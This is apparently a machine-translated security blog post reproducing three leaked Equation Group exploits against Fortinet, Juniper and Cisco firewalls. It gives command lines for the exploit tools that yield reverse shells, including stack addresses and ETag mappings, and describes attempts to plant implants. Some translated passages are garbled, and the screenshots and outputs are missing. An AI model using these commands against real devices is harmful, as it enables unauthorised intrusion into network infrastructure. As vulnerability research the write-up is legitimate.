analysis of nsa leakage

Posted by tzul at 2020-03-19

*The original author of this article: tigerlab, this article belongs to the freebuf original award program and is not allowed to be reproduced without permission

On August 16, 2016, the hacker group "the shadow brokers" claimed to have invaded the "equation group" and leaked part of the hacker tools they obtained from the computer system of the hacker group to the Internet.

For the first time, tag lab has conducted in-depth analysis on the leaked files. Most of the vulnerability verification and analysis have been shared by peers. Now we share the verification and Analysis on the other three vulnerabilities that have not been analyzed, including Fortinet, juniper and Cisco.

1. Fortinet vulnerability verification

This vulnerability is mainly due to a buffer overflow vulnerability in the cookie parser, which allows remote attackers to execute arbitrary code by sending a crafted HTTP request.

CVE No.: cve-2016-6909

The following versions are affected:

4. X before Fortinet fortios 4.1.11,

4.2. X before 4.2.13,

4.3. X before 4.3.9,

Fortiswitch before 3.4.3.

The vulnerability verification process is as follows:

Get target Etag and judge version type

curl -X HEAD  –v

curl -X HEAD  –v



If Etag is less than 4dxxxxxx, version 3 is applicable;

If Etag is greater than 4dxxxxxx, judge whether cookienum is required

curl -X HEAD  –v

Apscookie = 0 & 0, do not need to set cookienum when executing command


Apscookie_ = 0 & 0, cookienum needs to be set when executing the command, and the version is 4Nc


Test Etag is less than 4dxxxxxx, and cookienum does not exist

1) Get overflow address

Determine whether Etag exists in the configuration file egbl.config, for example:


If it does not exist, the stack address can be obtained by the following command:

./egregiousblunder_3.0.0.1 -t 80 -l 5432 –ssl 0 -v –config ./EGBL.config –wam 10

This command is only applicable to Etag less than 4dxxxxxx, and there is no cookienum. It is invalid in other versions and cannot get the stack address.

The command is executed as follows:


Get stack address 0xbffff274 successfully

2) Execute shellcode and return to shell

You can bounce the shell by directly passing in the stack address,

./egregiousblunder_3.0.0.1 -t -p 80 -l 5432 --ssl 0 -v --stack 0xbffff274  --nopen --gen 3

You can also write the Etag to the configuration file

ETAG = 480d772a : 0xbffff274

./egregiousblunder_3.0.0.1 -t -p 80 -l 5432 --ssl 0 -v –etag 480d772a --nopen --gen 3 --config ./EGBL.config


Shell returned successfully, execute - LS command to get file directory information.

In this test, the main low version of the tower equipment, Etag is less than 4dxxxxxx. Due to the fact that the exploit overflow process is not in depth, if the stack cannot be obtained by command in other versions, it is tested by traversing the memory address in the configuration file, and the shell can bounce back successfully.

2. Juniper vulnerability verification

The vulnerability needs to obtain juniper device password first, and then attack according to the device version and model to obtain system permission.

Telnet login to obtain device version information


The device version number is ssg5ssg20.6.1.0r2.0. Check whether the device file exists in dats


Loophole reappearance

BICE-3110 in BARGLEE folder is a juniper exploiter

. / bice-3110 - R *. *. *. * / / target IP

-D / / receive bounce shell host IP

-D 5555 / / receive bounce shell host port

-M telnet / / login mode SSH / telnet

-T.. /.. / dats / ssg5ssg20.6.1.0r2.0. XML / / attack code configuration

-U NetScreen / / device account

-P NetScreen / / device password

After success, return the basic information of the device. You can choose two kinds of shell permissions, juniper interactive shell and Bi shell.


The interactive console is actually the command operation after the joiner telnet enters.


BI shell


It can be seen that there are 6 options that can be executed:

Return to target status

Uninstall baglee

Install bulgee

Read memory

Write memory

Command execution

According to the installation instructions of barrice.txt in script, try to implant the barglee


The bin file type has been tried many times, but it has not been successfully implanted and cannot be analyzed in depth.


3. Cisco EPBA vulnerability verification

Like juniper, the vulnerability needs to obtain the device password first, and then obtain the system permission through overflow attack.

Loophole reappearance



The result is received MTU – EPBA: OK, payload: OK, indicating the overflow is successful.

At the same time, the control end of pix722 firewall will show buffer overflow


Next, we execute the script "bridge-1120" according to the operation prompt. After executing the "1" option, we can judge whether the connection is normal. If the connection is successful, we will return the session D-H key


After executing "8", you can view the shell function of Brice.


Multiple attempts to write to batigerlabnaglee indicate that the version is not correct and cannot be written.


It is found that the version number is obtained by reading the first four bytes of the target file, and all files in the folder are entered

The search did not find a suitable implant.


This paper mainly shares the verification idea and process of three vulnerability utilization files: forinet, juniper and Cisco. stay

In the process of analysis, we have carried out a lot of test experiments to restore the whole attack process as much as possible, but due to the lack of some key files, we can not continue to conduct a complete analysis. If there are small partners who have better analytical ideas, we can communicate with them.

*The original author of this article: tigerlab, this article belongs to the freebuf original award program and is not allowed to be reproduced without permission